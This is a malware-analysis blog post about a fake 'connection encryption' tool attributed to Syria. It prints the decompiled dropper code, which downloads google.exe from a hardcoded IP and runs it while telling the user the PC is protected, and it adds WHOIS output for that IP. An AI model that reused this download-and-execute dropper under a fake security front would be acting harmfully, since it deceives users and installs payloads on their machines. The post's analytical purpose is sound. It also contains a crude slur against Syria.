Syrian Malware

Howdy all!

Today we’re going to go through some malware straight out of the armpit of the world – Syria. There are of course hurdles to this – namely language barriers. A lot code I run into has Arabic characters, but the code is functionally the same. As you may (or not) know, there is a military conflict going on right now in Syria and they’re using cyber warfare. State sponsored malware has been seen and captured for analysis. We know its from Syria because the C&C servers go right back to Assad and government facilities in Syria.

I get my samples from a friend of mine Zach whom runs the site syrianmalware.com.

Today we’re going to look at a couple of examples. The first was fairly easy to pull apart. In fact, most of the crap out of Syria has been really easy to pull apart.
You know you’re dealing with pros when the malware looks like this:
haha

Awesome. There was no obfuscation done on this one either. As far as obfuscation goes, I’ve had pretty good luck so far as they only seem to be utilizing reflection:
worked

Now then, let’s have a look see at this malware.

// EncryptYourConection.Form1
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
private void Button1_Click(object sender, EventArgs e)
{
	int num2;
	int num3;
	try
	{
		IL_00:
		int num = 1;
		Interaction.MsgBox("Please Wait while Check Your PC", MsgBoxStyle.OkOnly, null);
		IL_0F:
		ProjectData.ClearProjectError();
		num2 = 1;
		IL_16:
		num = 3;
		Interaction.Shell("cmd.exe /ctree c:\\windows", AppWinStyle.NormalFocus, false, -1);
		IL_26:
		num = 4;
		Interaction.Shell("cmd.exe /ctree d:", AppWinStyle.MaximizedFocus, false, -1);
		IL_36:
		num = 5;
		Interaction.Shell("cmd.exe /ctree E:", AppWinStyle.NormalFocus, false, -1);
		IL_46:
		num = 6;
		Interaction.Shell("cmd.exe /ctree f:", AppWinStyle.NormalFocus, false, -1);
		IL_56:
		num = 7;
		Interaction.Shell("cmd.exe /ctree g:", AppWinStyle.NormalFocus, false, -1);
		IL_66:
		num = 8;
		Interaction.Shell("cmd.exe /ctree h:", AppWinStyle.NormalFocus, false, -1);
		IL_76:
		num = 9;
		Interaction.Shell("cmd.exe /ctree i:", AppWinStyle.NormalFocus, false, -1);
		IL_87:
		num = 10;
		Interaction.Shell("cmd.exe /ctree j:", AppWinStyle.NormalFocus, false, -1);
		IL_98:
		num = 11;
		Interaction.Shell("cmd.exe /ctree k:", AppWinStyle.NormalFocus, false, -1);
		IL_A9:
		num = 12;
		Interaction.Shell("cmd.exe /ctree l:", AppWinStyle.NormalFocus, false, -1);
		IL_BA:
		ProjectData.ClearProjectError();
		num2 = 1;
		IL_C1:
		num = 14;
		if (FileSystem.FileLen(Interaction.Environ("temp") + "\\google.exe") == 0L)
		{
			goto IL_FD;
		}
		IL_E1:
		num = 15;
		FileSystem.Kill(Interaction.Environ("temp") + "\\google.exe");
		IL_FD:
		num = 17;
		MyProject.Computer.Network.DownloadFile("http://216.6.0.28/google.exe", Interaction.Environ("temp") + "\\google.exe");
		IL_128:
		num = 18;
		Interaction.Shell(Interaction.Environ("temp") + "\\google.exe", AppWinStyle.MinimizedFocus, false, -1);
		IL_148:
		num = 19;
		this.ProgressBar1.Value = 50;
		IL_158:
		num = 20;
		Thread.Sleep(10000);
		IL_165:
		num = 21;
		this.Timer1.Enabled = true;
		IL_174:
		num = 22;
		Interaction.MsgBox("You PC is Protect now thank for using our Product", MsgBoxStyle.OkOnly, null);
		IL_184:
		num = 23;
		this.Button1.Enabled = false;
		IL_193:
		num = 24;
		this.Button2.Enabled = true;
		IL_1A2:
		goto IL_258;
		IL_1A7:
		int arg_1AC_0 = num3 + 1;
		num3 = 0;
		@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], arg_1AC_0);
		IL_219:
		goto IL_24D;
		num3 = num;
		@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num2);
		IL_22B:
		goto IL_24D;
	}
	object arg_22D_0;
	endfilter(arg_22D_0 is Exception & num2 > 0 & num3 == 0);
	IL_24D:
	throw ProjectData.CreateProjectError(-2146828237);
	IL_258:
	if (num3 != 0)
	{
		ProjectData.ClearProjectError();
	}
}

I rather liked this bit:

// EncryptYourConection.Form1
private void Button2_Click(object sender, EventArgs e)
{
	this.ProgressBar1.Value = 0;
	Interaction.MsgBox("You Are Running On unprotected Conection You Maybe At Risk !!!!", MsgBoxStyle.OkOnly, null);
	this.Button1.Enabled = true;
	this.Button2.Enabled = false;
}

Breakdown – Run the program and a shitty looking form appears. A command prompt window appears when you attempt to “secure” your system that just runs the ‘tree’ command. After that, the program attempts to download and run the file “http://216.6.0.28/google.exe”. The site just spins its wheels when I attempt to pull down the file, but inspecting the IP, we get the following info:

# http://whois.arin.net/rest/nets;handle=NET-216-6-0-0-2?showDetails=true&showARIN=false&ext=netref2
#

NetRange:       216.6.0.0 - 216.6.1.255
CIDR:           216.6.0.0/23
OriginAS:       
NetName:        SYRIAN-5
NetHandle:      NET-216-6-0-0-2
Parent:         NET-216-6-0-0-1
NetType:        Reassigned
Comment:        Fax-no-963 11 3739765
RegDate:        2005-07-22
Updated:        2005-07-22
Ref:            http://whois.arin.net/rest/net/NET-216-6-0-0-2

OrgName:        STE (Syrian Telecommunications Establishment)
OrgId:          SSTE
Address:        Fayz Mansour St
Address:        STE Building
City:           Damascus
StateProv:      
PostalCode:     
Country:        SY
RegDate:        2005-07-22
Updated:        2011-09-24
Ref:            http://whois.arin.net/rest/org/SSTE

OrgTechHandle: SAL55-ARIN
OrgTechName:   AL NASHEF, Samer 
OrgTechPhone:  +963 11 3739766 
OrgTechEmail:  sytld-admin@net.sy
OrgTechRef:    http://whois.arin.net/rest/poc/SAL55-ARIN

OrgAbuseHandle: SAL55-ARIN
OrgAbuseName:   AL NASHEF, Samer 
OrgAbusePhone:  +963 11 3739766 
OrgAbuseEmail:  sytld-admin@net.sy
OrgAbuseRef:    http://whois.arin.net/rest/poc/SAL55-ARIN

RTechHandle: SAL55-ARIN
RTechName:   AL NASHEF, Samer 
RTechPhone:  +963 11 3739766 
RTechEmail:  sytld-admin@net.sy
RTechRef:    http://whois.arin.net/rest/poc/SAL55-ARIN

GEE, I WONDER WHO COULD BE BEHIND THIS?

Stay tuned for part 2 when I go over the other 2 pieces. For now though, its late and I need my beauty rest.
1395616424498

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.